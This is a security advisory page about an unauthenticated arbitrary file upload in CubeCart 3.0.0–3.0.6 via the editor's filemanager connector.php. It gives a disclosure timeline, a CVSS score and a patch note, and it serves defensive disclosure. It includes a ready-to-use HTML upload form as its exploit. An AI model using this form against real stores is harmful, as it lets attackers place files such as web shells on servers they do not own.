Vulnerability CubeCart 3.0.0 ? 3.0.6

Credit: NSA Group
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Advisory: NSAG-&#185;197-23.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: or Product: CubeCart 3.0.0 ? 3.0.6 Site of manufacturer: The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 21/11/2005 - Answer of the manufacturer. 24/12/2005 - Patch. 29/12/2005 - New version CubeCart 3.0.7. 21/02/2006 - Publication of vulnerability. Original Advisory: Risk: Critical Description: Vulnerability exists because of insufficient check of authorization of the user in the script/includes/rte/editor/filemanager/browser/default/connectors/php/co nnector.php. Procedure of authorization include ("../includes/" is not connected. The removed user can by means of specially generated URL to load any files on target system. Influence: Vulnerability allows the removed user loading of any files on system. Exploit: <form action="http://host/cubedir/admin/includes/rte/editor/filemanager/browse r/default/connectors/php/connector.php?Command=FileUpload&Type=File&Curr entFolder=/" method="POST" enctype="multipart/form-data"> File Upload<br> <input id="txtFileUpload" type="file" name="NewFile"> <br> <input type="submit" value="Upload"> </form> Decision: Download patch or update new version 3.0.7 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Our company is the independent auditor of the software in market IT. At present independent audit of the software becomes the standard practice and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors! ?Nemesis? &#169; 2006 ------------------------------------ Nemesis Security Audit Group &#169; 2006.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top